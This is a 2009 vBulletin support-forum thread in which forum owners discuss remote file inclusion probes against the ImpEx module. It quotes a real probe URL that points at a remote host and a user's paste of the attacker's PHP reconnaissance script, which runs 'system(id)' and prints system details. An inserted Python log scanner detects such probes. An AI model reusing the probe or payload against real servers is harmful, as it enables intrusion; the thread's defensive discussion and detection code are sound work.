Potential hack??


  • Jobe1986
    replied
    I get these attempts daily on my forum, and mine is a quiet forum anyway. But at the end of the day, all the time you use the MOST up to date version of vBulletin, they are nothing more than attempts.


  • Windsun
    replied
    We have been getting similar attacks from some of the same IPs.

    According to another post, this is an effort to exploit an old bug. However, the fact that these just started up in the past couple days, and that several people have reported them makes me wonder.

    Example:
    .../ForumVB/index.php/impex/ImpExModule.php?systempath=http://www.henneferkanuteam.de/apboard/info.txt????
    I suspect it is some random bot trying to attack any VB board hoping to find a version with the exploit unfixed, it is just the sudden appearance of these attacks that makes me wonder.
    Last edited by Windsun; Mon 5 Jan '09, 10:11pm.


  • Sheridan
    replied
    I went to sleep....and then got up and opened my forum!

    Thank you!!!


  • steven s
    replied
    Originally posted by Sheridan
    Thank you...

    I have 3.7.0.. so am I screwed?
    I would say no. 3.7.0 was released April 2008.
    Don't forget, this was posted almost 3 years ago!
    Although, I would stay current on your versions.

    Edit: Open your forum and go to sleep.

    And more reading.
    http://www.securityfocus.com/bid/17206
    Vulnerable: VBulletin ImpEx 1.74
    - VBulletin VBulletin 3.5.4
    - VBulletin VBulletin 3.5.3
    - VBulletin VBulletin 3.5.2
    - VBulletin VBulletin 3.5.1
    1) You don't have ImpEx installed.
    2) You have v 3.7.0.


  • Sheridan
    replied
    Thank you...

    I have 3.7.0.. so am I screwed?


  • steven s
    replied
    http://xforce.iss.net/xforce/xfdb/25391

    Reported: Mar 23, 2006
    vBulletin ImpEx module ImpExData.php file include

    impex-impexdata-file-include (25391) Medium Risk Description:
    ImpEx could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the ImpExData.php script using the 'systempath' variable to specify a malicious PHP file from a remote system, which would allow the attacker to execute arbitrary code on the vulnerable system.
    Platforms Affected:
    • Jelsoft Enterprises, ImpEx 1.74 and prior
    • Jelsoft Enterprises, vBulletin 3.5.0 or later

    Remedy:
    Upgrade to the latest version of vBulletin (1.75 or later), available from the vBulletin Web site. See References.
    Edit: You don't have ImpEx installed, so there is no danger.
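
A defender's view of the probe described in the advisory above, as an added example that is not part of the original thread: Python that scans access-log lines for requests whose query parameter value is itself a remote URL (the `systempath=http://...` pattern quoted in this thread, generalized to any parameter name). The log lines, IP addresses and host names are constructed placeholders, and the function names are illustrative.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (Apache combined format); hosts and IPs are
# documentation placeholders, not values taken from the thread.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jan/2009:18:41:02 +0000] "GET /forum/index.php/impex/ImpExModule.php?systempath=http://files.example.invalid/info.txt???? HTTP/1.1" 200 5120 "-" "-"
203.0.113.7 - - [04/Jan/2009:18:41:05 +0000] "GET /forum/impex/ImpExData.php?systempath=http%3A%2F%2Ffiles.example.invalid%2Finfo.txt%3F HTTP/1.1" 404 312 "-" "-"
198.51.100.23 - - [04/Jan/2009:18:42:11 +0000] "GET /forum/showthread.php?t=42 HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.23 - - [04/Jan/2009:18:43:40 +0000] "GET /forum/search.php?do=process&query=http+proxy+settings HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
# A parameter value that is an absolute URL is the include-probe signature.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)


def find_rfi_probes(log_text):
    """Return one record per query parameter whose decoded value is a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, target, status = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append({
                    "ip": ip,
                    "path": parts.path,
                    "param": name,
                    "remote_host": urlsplit(value.strip()).hostname,
                    # 200 only means some script answered the request; it does
                    # not show that an include actually ran.
                    "status": int(status),
                })
    return hits


def probes_by_ip(hits):
    """Group hits by client IP for review."""
    grouped = defaultdict(list)
    for h in hits:
        grouped[h["ip"]].append((h["path"], h["param"], h["remote_host"], h["status"]))
    return dict(grouped)


if __name__ == "__main__":
    for ip, rows in probes_by_ip(find_rfi_probes(SAMPLE_LOG)).items():
        print(ip, len(rows), "probe(s):", rows)
```

The ordinary search for the words "http proxy settings" is not flagged, because the match requires the decoded value to start with a scheme followed by `://`.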


  • Sheridan
    replied
    doesn't make sense to me..that's why I made this post..

    but if you click on the link in your "whosonline" page that they are trying to access...your site will come up but it is not totally functional and it will have that odd address on the end of it.. It looks like the beginning of a redirect...

    And after I disabled guests...I have a stop sign next to the guests and the page they are trying to view.. So did I lock em out or not??

    I swear? Are there not any vBulletin folks out on a Sunday night?


  • gemmagy
    replied
    I went to http://www.scv.co.kr/zboard/info.txt which is part of the unknown path. This is what it says. Does any of this make any sense to you?

    <?php
    function ConvertBytes($number) {
        $len = strlen($number);
        if($len < 4) { return sprintf("%d b", $number); }
        if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
        if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
        return sprintf("%0.2f Gb", $number/1024/1024/1024);
    }
    echo "Osirys<br>";
    $un = @php_uname();
    $id1 = system(id);
    $pwd1 = @getcwd();
    $free1= diskfreespace($pwd1);
    $free = ConvertBytes(diskfreespace($pwd1));
    if (!$free) {$free = 0;}
    $all1= disk_total_space($pwd1);
    $all = ConvertBytes(disk_total_space($pwd1));
    if (!$all) {$all = 0;}
    $used = ConvertBytes($all1-$free1);
    $os = @PHP_OS;
    echo "0sirys was here and also is a ****ing gay..<br>";
    echo "uname -a: $un<br>";
    echo "os: $os<br>";
    echo "id: $id1<br>";
    echo "free: $free<br>";
    echo "used: $used<br>";
    echo "total: $all<br>";
    exit;


  • steven s
    replied
    Originally posted by Sheridan
    I don't have a folder on my server that says Impex... so I must not have it loaded..
    Then I would not worry about it.

    I'm running 3.7.0
    I would upgrade to 3.7.4p1 regardless.

    You are going to run out of banning room...lol..

    Go disable guests from viewing the forum..
    I don't think disabling guests won't do anything.

    Personally, I would not be concerned.


  • Sheridan
    replied
    I don't have a folder on my server that says Impex... so I must not have it loaded..

    I'm running 3.7.0

    You are going to run out of banning room...lol..

    Go disable guests from viewing the forum..


  • gemmagy
    replied
    I started banning the ip addresses that are at the unknown locations.


  • DonkRydah
    replied
    This is really weird, my board had the exact same thing and I had like 7 "guests" having the same thing on the online page. I hopped on here to make a thread but I found this one. What exactly is this? Oh yeah, the unknown location is the exact same address as the picture first attached.


  • steven s
    replied
    You don't have impex installed, do you?
    It looks like they are just fishing.

    I see people looking for files all the time in my error log.


  • MoH672
    replied
    I have kept my 3.7 board shut down for now until someone responds with an answer.


  • Sheridan
    replied
    I am seriously freaked out? How can I have an UNKNOWN LOCATION on the board?? I don't have a folder on my server for any of this..

    Are they redirecting my site? It's like they are scanning my site page by page.. But I don't have an ImpEx page..

    I locked my board for a while... But unlocked and they are back... from Colorado, Korea, and Massachusetts ..

    I just set my forum where unregistered guests cannot view the forum. It seems to have locked them out so far. But this is bad for business...

    Help!!
    Last edited by Sheridan; Sun 4 Jan '09, 6:57pm.
